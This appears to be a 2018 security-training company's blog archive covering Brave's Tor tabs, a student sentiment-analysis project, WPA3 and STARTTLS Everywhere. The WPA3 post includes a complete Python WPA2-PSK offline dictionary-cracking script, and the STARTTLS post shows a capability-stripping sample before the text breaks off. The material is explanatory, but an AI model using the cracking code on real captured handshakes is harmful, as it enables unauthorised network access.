Monthly Archives: June 2018

Brave Browser Adds Support for Private Browsing With Tor Integration

Category : Uncategorized

Brave Browser

Brave is a free and open-source pay-to-surf web browser based on the Chromium web browser and its Blink engine (except for its iOS version, which is a fork of Firefox for iOS and uses the WebKit engine). It was announced by Brendan Eich, co-founder of the Mozilla project and creator of JavaScript.

 


Brave Browser Adds Support for Private Browsing With Tor Integration

Brave, a lesser-known but perfectly usable browser, launched a new version today featuring a private browsing mode that automatically routes its traffic through a Tor session.

The Brave browser is known for its privacy-first features, and the new “Private Tabs with Tor” feature, as it is labelled in the interface, fits right in with the rest of the package.

 


Tor integration improves Brave’s privacy-focused features

The Brave team says the new “Private Tabs with Tor” feature is aimed at users who want protection that goes beyond the local PC.

Private browsing sessions were designed to wipe data from the browser once the session is closed. They do nothing to hide the browsing from the ISP or from the websites the user visits, both of which can log the traffic and the IP address it originates from.

Brave’s Tor-integrated private tabs hide the user’s IP address by passing the browser’s traffic through the Tor network.

The ISP sees only a connection to a Tor entry node, and the website sees only the address of a Tor exit node, so neither can tie the traffic to the user, just as with any other Tor traffic. Two caveats apply to any Tor integration: the exit node can read traffic that is not itself protected by HTTPS, and routing alone does not give the fingerprinting defences of a dedicated Tor Browser, so these tabs are a privacy improvement rather than a replacement for it.

As a way of giving back for the Tor technology integrated into Brave, the Brave team also announced that it would contribute to the Tor Project by running a couple of Tor relays to help keep the Tor network running.

 


Brave not yet stable, but a solid product nevertheless

Brave hasn’t reached a stable 1.0 version yet and is still under development, but the browser is highly regarded in privacy circles.

The reason is that Brave’s default configuration blocks ads, tracking scripts and cryptocurrency-mining scripts.

Furthermore, Brave’s normal private browsing mode, even before today’s addition of Tor support, was already fairly privacy-focused.

Brave private browsing tabs do not save the user’s browsing history or cookies, and they use DuckDuckGo, a search engine that does not track its users, as their default search provider.

 


Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 

 

 

 



A Study of the Indian BFSI Sector Based on Classification, Text Mining & Sentiment Analysis of Customer Feedback Using Python – By ICSS Student – Pijush Mandal

Category : Uncategorized

Sentiment Analysis

Sentiment Analysis is the process of determining whether a piece of writing is positive, negative or neutral. It’s also known as opinion mining, deriving the opinion or attitude of a speaker. A common use case for this technology is to discover how people feel about a particular topic.

With recent advances in deep learning, the ability of algorithms to analyse text has improved considerably, and careful use of these techniques can be an effective tool for in-depth research.

Used in combination, these basic concepts become an important tool for analysing very large numbers of brand conversations at an accuracy approaching that of human readers.

 


A Study of the Indian BFSI Sector Based on Classification, Text Mining & Sentiment Analysis of Customer Feedback Using Python

 

Abstract

In the era of social media, the use of social-networking data to study customers’ attitudes towards an organization, its services or its events has become a dominant trend in business strategic-management research. Sentiment analysis, also called opinion mining, is a field of study that aims at extracting opinion and sentiment from natural-language text using computational methods. With the growth of the Internet, numerous business websites allow online reviews and comments on services, either as business forums or as social networks. Mining opinion automatically from the reviews on such platforms is not only useful for customers seeking advice but also necessary for a business to understand its customers and improve its services. This paper presents the design and implementation of a system to group, summarize and analyze the sentiment of customer feedback. The framework addresses feedback overload, congestion and the difficulty of prioritizing valuable feedback for an organization; it performs text mining, sentiment analysis and classification on a dataset collected from several websites. The accuracy achieved indicates that the approach is reliable enough for future implementation.

 


Introduction

Understanding what customers think about a business’s products or services has always been one of the most important issues in business strategic management, particularly in decision-making. People’s beliefs, their perceptions of reality and the choices they make are conditioned to some extent by how others act, and this is true of organizations as well as individuals. While consumers hunger for and rely on online advice and recommendations about products and services, businesses demand tools that can turn customers’ thoughts and conversations into customer insight, and into input for social-media monitoring, reputation management and voice-of-the-customer programs. Traditionally, individuals asked friends and family for opinions, while businesses relied on surveys, focus groups, opinion polls, feedback collectors and consultants. In the age of Big Data, with millions of consumer reviews and discussions flooding the Internet every day, individuals feel overwhelmed by the information and it is impossible for a business to keep up manually. There is therefore a clear need for computational methods that analyze feedback automatically.

In this paper we propose a method for managing feedback, reducing overload by grouping feedback according to the users’ activities, analyzing its sentiment and summarizing it. The classifier and summarizer extract information from each feedback message and build a model from the most frequent words in the messages in order to group them by activity. Several approaches to the classification and sentiment analysis are compared.

 


Impact of Sentiment Analysis

An organization needs a complete understanding of its customers’ opinions of, and needs from, the products or services it offers, but the sources of those opinions are mostly unstructured text. Sentiment about products and services is now not just a source of customer reviews and references but an input to customer service, business intelligence and brand-reputation management.

Some of the fundamental voice-of-the-customer questions an organization wants answered are:

  • Are customers satisfied with the services, products and support?
  • What do customers like?
  • What do customers think of the products and services offered by competitors?
  • What influences the market, and how do opinions propagate?

 

The technical challenges include handling noise and linking the opinions with structured data. Business intelligence here means the technologies and methodologies used to collect, integrate and analyze opinion and sentiment information in a business for the purpose of better decision-making.

As for the benefits of sentiment analysis in contemporary companies, it is worth noting its use by a company or brand to analyze reviews of its products and services, its use by financial investors who want to discover and respond to market opinion, and its use in politics, where campaigns are interested in tracking the sentiment voters express about candidates.

Sentiment analysis can likewise be used in several business areas such as economics, finance and marketing. In economics it helps answer how supervised learning can learn the association between the polarity of financial news and key financial indicators. In marketing, judging consumer sentiment makes it much easier to position a new product in consumers’ minds.

 


Related Work

Previously, one of the most common methods was to manually archive feedback into folders in order to reduce the number of items a user must process at any given time. This is an insufficient solution: folder names are not necessarily a true reflection of their content, and creating and maintaining the folders imposes a significant burden on the user.

 

There are several feedback-analysis tools available, such as:

  1. Feedier: collects actionable feedback and engages and rewards an organization’s customers.
  2. Receptive: collects, measures and helps understand feedback from customers, internal teams and prospects. It is a specialist product for B2B and SaaS organizations.
  3. Zonka Feedback: a comprehensive feedback-management system with customizable surveys, instant alerts, real-time reports and more.
  4. Informizely: quickly gathers customer insights with in-site surveys and polls.
  5. ai: makes customer-feedback analysis very easy.

 

Earlier methods for sentiment analysis were mostly based on manually defined rules. With the recent development of deep learning, neural-network-based approaches have become the mainstream, and many researchers additionally apply linguistic knowledge for better performance.

 

  1. Traditional sentiment analysis: Many methods focus on feature engineering. Carefully designed features are fed to a machine-learning method in a supervised setting, so the performance of sentiment classification depends heavily on the chosen feature representation of the text. Representations used in sentiment analysis include bag-of-words, word co-occurrences and syntactic contexts. Despite its effectiveness, feature engineering is labour-intensive and cannot by itself discover and organize the discriminative information in the data.

  2. Sentiment analysis by neural network: Since the proposal of simple and effective methods for learning distributed representations of words and phrases, neural-network models have shown great success in many natural language processing (NLP) tasks, including classification, sentiment analysis and information extraction. These models exploit the distribution of word co-occurrences through neural word embeddings. Short, coherent pieces of text extracted by the model are often sufficient for prediction and classification, and can be used to explain the result.

  3. Linguistic knowledge: Linguistic knowledge has been incorporated into models to realize their full potential in prediction accuracy. Classical linguistic knowledge and sentiment resources include sentiment lexicons, negators and intensifiers. Sentiment lexicons are valuable for rule-based or lexicon-based models, and there are also studies on constructing them automatically from social data or across multiple languages.

 

Extracting information from feedback used to be done manually, but nowadays it can be done with online text-mining tools such as ‘Ranks.nl’, ‘Vivisimo/Clusty’ and ‘Wordle’, and with commercial text-mining software such as ‘ActivePoint’, ‘Aiaioo Labs’ and ‘AKIN Desktop HyperSearch’.

 


Classification can be done with various classifiers, for example:

  1. RIPPER text classification: The RIPPER algorithm is often used in automatic e-mail filtering. It is a rule-based learner that generates keyword-selection rules automatically instead of relying on manual selection, and it is fast and able to deal with large sets of attributes.

  2. Nearest-neighbour classification: This approach has been explored in a study of feature selection using mutual information. It is a simple numeric algorithm that treats each feature vector as a point in n-dimensional space and finds the nearest stored vector in terms of distance. Boone found that nearest neighbour is particularly effective when only a few examples of each folder are presented to the algorithm.

 


Our Solutions

Statistical algorithms can fill the gaps in rule-based methods, but at the cost of more processing time. One area where applied research is lacking is the use of Natural Language Processing (NLP) for feature selection, that is, dropping insignificant features. Although tedious to apply, it offers the potential to classify unclassified feedback more effectively, because information extraction combined with text classification provides not only the relative weights of attribute words but also helps to find the attributes themselves.

The proposed algorithm uses NLP and probabilistic techniques for feedback classification and association, and for recognizing and predicting the class and sentiment of new data.

We use several classification techniques for better results:

  1. Naïve Bayes classification: Naïve Bayes is a probabilistic classifier. From the training feedback it estimates, for each class, the prior probability of the class and the probability of each word given the class (from the word counts in that class’s folder). For a new feedback message it multiplies the prior by the probabilities of the words in the message and, by Bayes’ rule, assigns the message to the class with the highest resulting likelihood. The ‘naïve’ assumption is that the words are conditionally independent given the class.

  2. Support Vector Machine classification: A Support Vector Machine (SVM) is a supervised machine-learning algorithm that can be used for both classification and regression. For classification, each data item is plotted as a point in n-dimensional space, with the value of each feature as a coordinate, and the classifier is the hyperplane that separates the classes with the widest margin.

Information extraction is performed on unstructured or semi-structured documents. Named-Entity Recognition (NER), also known as entity identification or entity extraction, is well suited to extracting information from such data. With NER, spans of the text can be classified into predefined categories such as ‘Name of Person’, ‘Organization Name’, ‘Date and Place’, ‘Expressions of Time’, ‘Monetary Value’, ‘Category of Transaction’ and more.

 


Workflow

The Internet plays a vital role in this work, as the dataset is collected from websites (such as ‘www.bankbazzar.com’, ‘www.glassdoor.co.in’, ‘www.mouthshut.com’ and ‘www.indeed.co.in’) that carry feedback on the BFSI services popularly used in India. Customer feedback and reviews are the statements given by customers who have used these services. Based on the words and star ratings they use, the feedback is first classified by service and then passed to the next step. Naïve Bayes and Support Vector Machine classifiers are applied; with this supervised-learning approach, the star rating of new feedback can be predicted by sentiment analysis, the feedback can be classified into its class, and information can be extracted from it. Scores are calculated and compared between the two methods for accuracy. Finally, NER models are used to extract information from the feedback into the previously defined categories.

For classification and sentiment analysis, each feedback message is scored with both the Naïve Bayes classifier and sentiment analyser and the SVM classifier and sentiment analyser, and a comparative study is made to choose the better of the two algorithms. The steps are: the recorded feedback is imported from the dataset and separated by class; the sentiment-analysis and classification algorithms are applied; positive, negative and neutral feedback counts are calculated and the classes divided; scores are calculated with both methods; and the comparison is used to judge accuracy.
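The Naïve Bayes classifier and the scoring step of the workflow above are shown end to end in the following added example. It is not the student project’s code (which is not reproduced on the page) and uses no external library, so it runs offline; the training and test feedback lines, their polarity labels and the class names are constructed for the example and are not taken from the review sites named above.

```python
"""Multinomial Naive Bayes sentiment classifier over bag-of-words features.

Added example for this article; it is not the author's project code. The
feedback lines below are constructed for illustration and are not taken from
any of the review sites named in the paper.
"""
import math
import re
from collections import Counter, defaultdict

# Constructed sample of BFSI customer feedback with hand-assigned polarity.
TRAIN = [
    ("the bank staff were helpful and the loan was approved quickly", "positive"),
    ("excellent customer service and a great savings account", "positive"),
    ("quick response from support and very friendly manager", "positive"),
    ("the app is easy to use and the interest rate is good", "positive"),
    ("terrible customer service and hidden charges on my card", "negative"),
    ("the branch manager was rude and my complaint was ignored", "negative"),
    ("loan processing is slow and the fees are very high", "negative"),
    ("worst experience, the app keeps crashing and support never replies", "negative"),
    ("the account opening took the usual time, nothing special", "neutral"),
    ("average service, the branch is fine but the queue is long", "neutral"),
    ("the card works as expected, no complaints and no praise", "neutral"),
    ("standard fees and a normal waiting time at the counter", "neutral"),
]

# Constructed held-out feedback, used to compare predictions with gold labels.
TEST = [
    ("helpful staff and quick loan approval", "positive"),
    ("rude manager and hidden fees", "negative"),
    ("average branch, normal waiting time", "neutral"),
]

TOKEN_RE = re.compile(r"[a-z]+")


def tokenize(text):
    """Lower-case the text and return its alphabetic word tokens (bag of words)."""
    return TOKEN_RE.findall(text.lower())


def train(samples):
    """Estimate class document counts and per-class word counts from labelled samples."""
    class_counts = Counter()
    word_counts = defaultdict(Counter)
    vocab = set()
    for text, label in samples:
        class_counts[label] += 1
        for w in tokenize(text):
            word_counts[label][w] += 1
            vocab.add(w)
    return {"class_counts": class_counts, "word_counts": word_counts, "vocab": vocab}


def log_posteriors(model, text):
    """log P(class | text) up to a constant. Add-one (Laplace) smoothing keeps a
    word unseen in one class from zeroing that class out; log space avoids underflow."""
    total_docs = sum(model["class_counts"].values())
    v = len(model["vocab"])
    scores = {}
    for label, n_docs in model["class_counts"].items():
        counts = model["word_counts"][label]
        n_words = sum(counts.values())
        score = math.log(n_docs / total_docs)  # class prior
        for w in tokenize(text):
            score += math.log((counts[w] + 1) / (n_words + v))  # P(word | class)
        scores[label] = score
    return scores


def predict(model, text):
    """Return the most probable class for one feedback line."""
    scores = log_posteriors(model, text)
    return max(scores, key=scores.get)


def accuracy(model, samples):
    """Fraction of labelled samples the model classifies correctly."""
    correct = sum(predict(model, t) == y for t, y in samples)
    return correct / len(samples)


if __name__ == "__main__":
    model = train(TRAIN)
    for text, gold in TEST:
        print(f"{gold:8s} -> {predict(model, text):8s} | {text}")
    print("accuracy:", accuracy(model, TEST))
```

Running the file prints the predicted polarity beside the gold label for each held-out line and the accuracy. The same train/predict pair classifies feedback by service class instead of by polarity simply by changing the labels in the training data, which is how the workflow’s two classification tasks can share one implementation.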

 

Information is extracted from the data with Stanford NER, a Java implementation of a named-entity recognizer. NER labels the words in a text that name things such as persons, companies and so on. Stanford NER provides three models: a 3-class model (Location, Person, Organization), a 4-class model (Location, Person, Organization, Misc.) and a 7-class model (Location, Person, Organization, Money, Percent, Date, Time).

 


Methodology

Feedback on the BFSI services popularly used in India is collected from websites (such as ‘www.bankbazzar.com’, ‘www.glassdoor.co.in’, ‘www.mouthshut.com’ and ‘www.indeed.co.in’). Positive feedback reports good customer service, a beneficial product or service, a pleasant environment and good management. Negative feedback reports bad customer service, a product or service that falls short of the customer’s expectations, bad conditions, or management that does not meet the customer’s expected or the standard level for the sector. Average feedback reports average service, products and management.

 


Exploration

To visualize the data a little more, some graphs are plotted with the Seaborn library. Seaborn’s FacetGrid creates a grid of histograms placed side by side, which makes it possible to see whether there is any relationship between the variables.

 

 

Overview of Python

Python is a general-purpose, dynamic, high-level, interpreted programming language. It supports the object-oriented approach to developing applications. It is relatively simple and easy to learn because its syntax focuses on readability: developers can read and understand Python code more easily than code in many other languages. In turn, this reduces the cost of program maintenance and development because it allows teams to work together without significant language and experience barriers.

Python is dynamically typed, so the data types of variables need not be declared (for example, writing a = 10 makes ‘a’ an integer). Like most languages, Python has a number of basic types including integers, floats, booleans and strings, which behave in ways familiar from other programming languages.

Python can also be used to process text, display numbers or images, save data and so on, so it was used as the scripting language for the Natural Language Processing in this project. The Python statements used most frequently are:

 

  • The if statement checks a condition: if the condition is true, a block of statements (the if-block) runs, else another block (the else-block) runs. Nested if or elif can be used for multiple conditions.

 

  • The for statement iterates over the members of a sequence in order, executing the block each time. In contrast, the while loop is used when a condition needs to be checked on each iteration, or to repeat a block of code until a condition changes.

  • The try statement sets up exception-handling blocks. The keywords try and except are used to catch exceptions: when an error occurs within the try block, Python looks for a matching except block to handle it.

  • The def statement defines a function or method.

  • The import statement imports modules whose functions can be used in the current program.

  • The print statement sends output to standard output. In Python 3 it became a function, print().

 


Important Libraries of Python used in Project

One of Python’s greatest assets is its extensive set of libraries. Libraries are sets of routines and functions written in a given language; a robust set of libraries makes it easier for developers to perform complex tasks without rewriting many lines of code. The libraries below turn Python from a general-purpose programming language into a powerful tool for data analysis and visualization. The libraries used in this project are:

  1. NumPy is the foundational library for scientific computing in Python, and many of the libraries on this list use NumPy arrays as their basic inputs and outputs. In short, NumPy introduces objects for multidimensional arrays and matrices, as well as routines that let developers perform advanced mathematical and statistical functions on those arrays with as little code as possible.
  2. Pandas adds data structures and tools designed for practical data analysis in finance, statistics, social sciences and engineering. Pandas works well with incomplete, messy and unlabelled data (the kind of data you are likely to encounter in the real world) and provides tools for shaping, merging, reshaping and slicing datasets.
  3. SciPy builds on NumPy by adding a collection of algorithms and high-level commands for manipulating and visualizing data. The package includes functions for computing integrals numerically, solving differential equations, optimization and more.
  4. NLTK, the Natural Language Toolkit, is a set of libraries designed for Natural Language Processing (NLP). NLTK’s basic functions allow you to tag text, identify named entities and display parse trees, which are like sentence diagrams that reveal parts of speech and dependencies. From there you can do more complicated things such as sentiment analysis and automatic summarization.

 


Conclusions

In the modern era, as online interaction has bridged physical distance and allowed companies to pursue profit and expand their business and reputation worldwide, keeping in touch with customers has become more and more important for business. To keep a finger on the pulse of the customer, a business must have access to reliable feedback and be able to analyze it properly.

Sentiment analysis, classification and information extraction remain challenging problems that attract researchers from many disciplines; their applications are practical, promising and varied across many industries, including the BFSI sector.

 


Project Done by ICSS Student – Pijush Mandal (PDF)

 


WPA3 New Wi-Fi Standard Released

Category : Uncategorized

WPA3 New Wi-Fi Standard Released

WPA stands for Wi-Fi Protected Access, a family of security standards for Wi-Fi networks. It was developed in response to the weaknesses of WEP (Wired Equivalent Privacy) and improves on WEP’s authentication and encryption.

The Wi-Fi Alliance, the organization that manages Wi-Fi certification, has announced the official release of WPA3.

WPA3 is the latest version of Wi-Fi Protected Access (WPA), the technology that authenticates clients to a Wi-Fi network and encrypts the traffic between them.

News that the Wi-Fi Alliance was working on WPA3 surfaced in January. The announcement came after a security researcher disclosed KRACK, a key-reinstallation vulnerability in the WPA2 four-way handshake that let an attacker within radio range force nonce reuse and decrypt or replay traffic on a WPA2-protected network (it did not reveal the network password).

WPA3 is currently optional for newly produced devices, but the Wi-Fi Alliance expects it to become a requirement for Wi-Fi certified devices in the coming years.

 


WPA3-Personal and WPA3-Enterprise

Like WPA and WPA2 before it, WPA3 comes in two “security modes”, WPA3-Personal and WPA3-Enterprise. The main difference between them is in the authentication stage.

WPA3-Personal uses the Simultaneous Authentication of Equals (SAE) handshake in place of the WPA2-Personal pre-shared-key (PSK) four-way handshake; the network still has a password, but it is no longer used directly to derive the session keys. WPA3-Enterprise keeps the IEEE 802.1X/EAP authentication of WPA2-Enterprise and adds an optional 192-bit mode with a stronger, consistently applied cryptographic suite.

The WPA3-Enterprise mode is recommended for devices used on enterprise, government and financial networks.

WPA3-Personal is the mode most of us will interact with regularly once older devices are replaced.

Here are some key features provided by the new protocol:

1.) Protection Against Brute-Force Attacks

WPA3 provides stronger protection against offline dictionary attacks. With WPA2-PSK, an attacker who records a single four-way handshake can test password guesses offline, as fast as their hardware allows, until a commonly used password matches. With SAE, each guess requires a live exchange with the access point, so guessing is slow, observable and can be rate-limited, which makes even less complex passwords considerably harder to crack.

2.) WPA3 Forward Secrecy

WPA3 leverages the SAE handshake to offer forward secrecy, which prevents attackers from decrypting previously captured traffic even if they later learn the network password.

 


WPA3 is resistant to dictionary attacks

The Wi-Fi Alliance says that WPA3’s SAE is resistant to offline dictionary attacks, in which an attacker captures a handshake and then tries candidate passwords against it without any further contact with the network.

Because every guess must be made online, the access point can observe and throttle them; security experts who have analysed the standard note that an access point can block authentication requests after several failed attempts, limiting the impact of such brute-force attacks.

Furthermore, WPA3’s SAE also provides forward secrecy. The session keys are derived from fresh ephemeral values exchanged in each handshake rather than from the password alone, so a password that leaks later does not compromise earlier sessions.
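The difference between the WPA2 and WPA3 handshakes is easiest to see from the attacker’s side. The following added example (not code from the Wi-Fi Alliance, a vendor or this article) implements the WPA2-Personal key derivation from the standard, builds a constructed handshake and runs the offline dictionary loop against it; the SSID, MAC addresses, nonces, EAPOL frame bytes and word list are all made up for the example. Every step the attacker performs depends only on the recorded packets plus a password guess, which is exactly what SAE removes: in WPA3-Personal the password goes into a commit exchange the client must complete live with the access point, so a recording alone gives nothing to test guesses against.

```python
"""Offline dictionary attack against a captured WPA2-PSK four-way handshake.

Added example for this article; it is not Wi-Fi Alliance, vendor or attack-tool
code. It implements the WPA2-Personal key schedule (PBKDF2-HMAC-SHA1 PMK,
PRF-384 PTK expansion, HMAC-SHA1 EAPOL-Key MIC) on a constructed handshake so
the attacker's offline loop can be shown end to end. The SSID, MAC addresses,
nonces, EAPOL frame bytes and the word list are all made up for the example.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(ptk: bytes, eapol_frame: bytes) -> bytes:
    """EAPOL-Key MIC for the HMAC-SHA1 AKM: keyed with the KCK (first 16 bytes of the PTK)."""
    kck = ptk[:16]
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def capture_handshake(ssid: str, passphrase: str) -> dict:
    """What a passive sniffer records: SSID, both MACs, both nonces, the message-2
    EAPOL-Key frame with its MIC field zeroed, and the MIC itself.
    All values are fixed constructed constants so the example is reproducible."""
    ap_mac = bytes.fromhex("02aabbccdd01")
    sta_mac = bytes.fromhex("02aabbccdd02")
    anonce = bytes(range(0x10, 0x30))  # 32 constructed bytes
    snonce = bytes(range(0x40, 0x60))
    eapol = b"\x02\x03\x00\x5f\x02\x01\x0a" + b"\x00" * 90  # stand-in frame, MIC zeroed
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(ptk, eapol)}


def crack(cap: dict, wordlist) -> tuple:
    """Attacker side: each candidate costs one PBKDF2, one PRF and one HMAC, and
    needs no further contact with the network. Returns (passphrase or None, guesses)."""
    guesses = 0
    for candidate in wordlist:
        guesses += 1
        pmk = pmk_from_passphrase(candidate, cap["ssid"])
        ptk = ptk_from_pmk(pmk, cap["ap_mac"], cap["sta_mac"], cap["anonce"], cap["snonce"])
        if hmac.compare_digest(eapol_mic(ptk, cap["eapol"]), cap["mic"]):
            return candidate, guesses
    return None, guesses


if __name__ == "__main__":
    cap = capture_handshake("BFSI-Guest", "password123")
    print(crack(cap, ["letmein", "welcome1", "password123", "qwerty"]))
```

The only per-guess cost is the 4096-round PBKDF2, which GPU crackers run at millions of guesses per second on the attacker’s own schedule; nothing in the loop contacts the access point, so no lockout or logging can interfere. Under SAE the password is never used to derive a value that appears in, or can be checked against, the recorded exchange, so the same recording is useless and each guess has to be spent as a live handshake that the access point can count and throttle.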

 


Wi-Fi Easy Connect for WPA2 and WPA3

A separate Wi-Fi feature announced alongside WPA3 is a technology called Wi-Fi Easy Connect. It is aimed at Internet of Things devices that have no screen on which a user could enter Wi-Fi network settings.

For example, a user can use a phone or tablet to provision the Wi-Fi credentials of a screenless device such as a smart lock or a smart light bulb, typically by scanning a QR code printed on the device.

 


Wi-Fi Enhanced Open

Earlier this month, the Wi-Fi Alliance also announced Wi-Fi Enhanced Open, another certification program, this one meant for “open Wi-Fi networks” such as those in airports, malls, bars or internet cafes.

The technology uses Opportunistic Wireless Encryption (OWE), a Diffie-Hellman key exchange performed when a client associates, so that each client ends up sharing its own unique encryption key with the access point.

This per-user encryption prevents local attackers from passively snooping on other users’ traffic, even though the network requires no password to join. It does not authenticate the access point, however: an attacker running a rogue access point with the same name can still sit in the middle, so Enhanced Open is a defence against eavesdropping rather than a substitute for a WPA3 network with a password.

Following the disclosure of the KRACK vulnerability, the Wi-Fi Alliance has reacted admirably and has released technologies meant to boost everyone’s security. Now, all that remains is for device vendors to incorporate them in new products at their earliest convenience.

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 

 

 



EFF Launches Encryption Initiative for Email Domains Named STARTTLS Everywhere

Category : Uncategorized


EFF (Electronic Frontier Foundation) announced a new project named STARTTLS Everywhere that aims to help mail server administrators deploy STARTTLS properly: with a valid certificate, with that certificate actually verified by the other side, and with protection against downgrade attacks.

STARTTLS Everywhere is closely modelled on Let’s Encrypt, the free certificate authority the EFF launched together with Mozilla and Cisco two years ago.

But this initiative aims to bring encrypted communications to email servers, instead of web servers (Let’s Encrypt’s purpose).

 

What’s STARTTLS

STARTTLS is an addition to SMTP, which allows one email server to say to the other, “I want to deliver this email to you over an encrypted communications channel.” The recipient email server can then say “Sure! Let’s negotiate an encrypted communications channel.” The two servers then set up the channel and the email is delivered securely, so that anybody listening in on their traffic only sees encrypted data. In other words, network observers gobbling up worldwide information from Internet backbone access points (like the NSA or other governments) won’t be able to see the contents of messages while they’re in transit, and will need to use more targeted, low-volume methods.

In practice, the receiving server presents a certificate and the two servers negotiate a TLS session, after which the message travels encrypted over that hop. This is transport encryption between two servers, not end-to-end encryption: the message is decrypted on arrival and sits in cleartext on every server that handles it, and a message that crosses several relays is protected only on the hops where both sides negotiate TLS.

 

STARTTLS already protects most email in transit

STARTTLS is not new by any stretch of the imagination. The SMTP extension was standardized in 1999 (RFC 2487, later revised as RFC 3207), and according to Google’s latest email encryption transparency report, roughly 89% of the mail Gmail exchanges with other providers is already encrypted in transit.

But despite its huge reach, EFF experts say STARTTLS is often misconfigured.

An attacker positioned between two mail servers can present an invalid or self-signed certificate and impersonate the recipient, because most sending servers do not verify the certificate they are shown: they accept anything rather than risk failing delivery, which is why this mode is called opportunistic TLS.

Furthermore, because STARTTLS is opportunistic by design, an encrypted channel can be downgraded to cleartext delivery. The sender uses TLS only if the recipient advertises the STARTTLS capability in its reply to EHLO, and that reply travels in cleartext, so an active attacker on the path can simply strip the capability and the sender falls back to sending the message unencrypted.

This fallback exists so that mail still flows when one server does not support STARTTLS, but during the past few years security researchers and privacy advocates have repeatedly caught ISPs in various countries intentionally stripping STARTTLS for purposes ranging from state-wide surveillance to user tracking and advertising.
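The EHLO exchange, the downgrade just described, and the policy a preload list makes possible, as an added example (not code from the EFF or from STARTTLS Everywhere). The EHLO replies, the “XXXXXXXA” mangling scenario, the domains and the preload set are constructed; the capability parsing and the ssl context are the parts a sending MTA would actually need:

```python
import re
import ssl
from typing import List, Tuple

# Constructed EHLO replies, as the sending MTA sees them after "EHLO sender.example.com".
EHLO_WITH_STARTTLS = (
    "250-mail.example.org\r\n250-SIZE 52428800\r\n250-STARTTLS\r\n250 8BITMIME\r\n"
)
# Same server, but a middlebox on the path has overwritten the capability with the
# well-known "XXXXXXXA" mangling, so the sender believes TLS is unavailable.
EHLO_STRIPPED = (
    "250-mail.example.org\r\n250-SIZE 52428800\r\n250-XXXXXXXA\r\n250 8BITMIME\r\n"
)
EHLO_LEGACY = "250-legacy.example.net\r\n250 8BITMIME\r\n"

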